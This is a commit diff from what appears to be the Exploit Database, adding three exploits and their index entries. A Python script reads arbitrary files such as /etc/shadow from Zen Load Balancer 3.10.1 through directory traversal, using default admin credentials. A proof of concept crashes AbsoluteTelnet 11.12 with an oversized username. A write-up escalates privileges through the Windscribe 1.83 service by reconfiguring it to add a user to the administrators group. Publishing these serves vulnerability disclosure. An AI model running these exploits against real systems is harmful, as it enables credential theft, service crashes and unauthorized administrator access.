DB: 2020-04-11
3 changes to exploits/shellcodes AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC) Windscribe 1.83 - 'WindscribeService' Unquoted Service Path Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
This commit is contained in:
Offensive Security
parent
0f8df71e72
commit
4ee0ce31e7
4 changed files with 108 additions and 0 deletions
31
exploits/cgi/webapps/48308.py
Executable file
31
exploits/cgi/webapps/48308.py
Executable file
|
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
|
||||
# Date: 2020-04-10
|
||||
# Exploit Author: Basim Alabdullah
|
||||
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
|
||||
# Version: 3.10.1
|
||||
# Tested on: Debian8u2
|
||||
#
|
||||
# Technical Details:
|
||||
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
|
||||
# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
|
||||
# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
|
||||
#
|
||||
# Impact:
|
||||
# --------
|
||||
# Successful exploitation could allow an attacker to obtain sensitive
|
||||
# information.
|
||||
|
||||
import requests
|
||||
import sys
|
||||
|
||||
if len(sys.argv) <2:
|
||||
print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
|
||||
sys.exit(-1)
|
||||
else:
|
||||
files=sys.argv[2]
|
||||
url=sys.argv[1]
|
||||
with requests.session() as s:
|
||||
urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
|
||||
response = s.get(urlz, auth=('admin', 'admin'), verify=False)
|
||||
txt=response.text
|
||||
print(response.text)
|
||||
22
exploits/windows/dos/48305.py
Executable file
22
exploits/windows/dos/48305.py
Executable file
|
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
|
||||
# Discovery by: chuyreds
|
||||
# Discovery Date: 2020-05-02
|
||||
# Vendor Homepage: https://www.celestialsoftware.net/
|
||||
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
|
||||
# Tested Version: 11.12
|
||||
# Vulnerability Type: Denial of Service (DoS) Local
|
||||
# Tested on OS: Windows 10 Pro x64 es
|
||||
|
||||
# Steps to produce the crash:
|
||||
# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
|
||||
# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
|
||||
# 3.- Open AbsoluteTelnet
|
||||
# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
|
||||
# 5.- In "username" field paste Clipboard
|
||||
# 6.- Select "OK"
|
||||
# 7.- Crashed
|
||||
|
||||
buffer = "\x41" * 1000
|
||||
f = open ("absolutetelnet_username_SSH1.txt", "w")
|
||||
f.write(buffer)
|
||||
f.close()
|
||||
52
exploits/windows/local/48306.txt
Normal file
52
exploits/windows/local/48306.txt
Normal file
|
|
@ -0,0 +1,52 @@
|
|||
# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
|
||||
# Date: 2020-04-10
|
||||
# Exploit Author: MgThuraMoeMyint
|
||||
# Vendor Homepage: https://windscribe.com
|
||||
# Version: v1.83 Build 20
|
||||
# Tested on: Windows 10, version 1909
|
||||
|
||||
In windscribe v1.83 , there is a service via windscribe that every
|
||||
authenticated user can modify.
|
||||
|
||||
C:\Users\mgthura>sc qc WindscribeService
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
SERVICE_NAME: WindscribeService
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : WindscribeService
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
That shows that running as Local System this means that the
|
||||
BINARY_PATH_NAME parameter can be modified to execute any command on
|
||||
the system.
|
||||
I'll change binary_path_name with a command that add a user to
|
||||
administrators group , so it will be
|
||||
|
||||
C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup
|
||||
administrators pentest /add"
|
||||
[SC] ChangeServiceConfig SUCCESS
|
||||
|
||||
C:\Users\mgthura>sc stop WindscribeService
|
||||
|
||||
SERVICE_NAME: WindscribeService
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
STATE : 3 STOP_PENDING
|
||||
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
|
||||
WIN32_EXIT_CODE : 0 (0x0)
|
||||
SERVICE_EXIT_CODE : 0 (0x0)
|
||||
CHECKPOINT : 0x4
|
||||
WAIT_HINT : 0x0
|
||||
|
||||
C:\Users\mgthura>sc start WindscribeService
|
||||
[SC] StartService FAILED 1053:
|
||||
The service did not respond to the start or control request in a timely fashion.
|
||||
|
||||
Restarting service will cause the service to fail as the binary path
|
||||
would not point into the actual executable of the service.
|
||||
However the command will be executed successfully and the user will be
|
||||
added to the local administrators group.
|
||||
|
|
@ -6702,6 +6702,7 @@ id,file,description,date,author,type,platform,port
|
|||
48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
|
||||
48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
|
||||
48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
|
||||
48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
|
@ -11024,6 +11025,7 @@ id,file,description,date,author,type,platform,port
|
|||
48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
|
||||
48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
|
||||
48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
|
||||
48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
|
@ -42547,3 +42549,4 @@ id,file,description,date,author,type,platform,port
|
|||
48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,
|
||||
48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
|
||||
48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware,
|
||||
48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue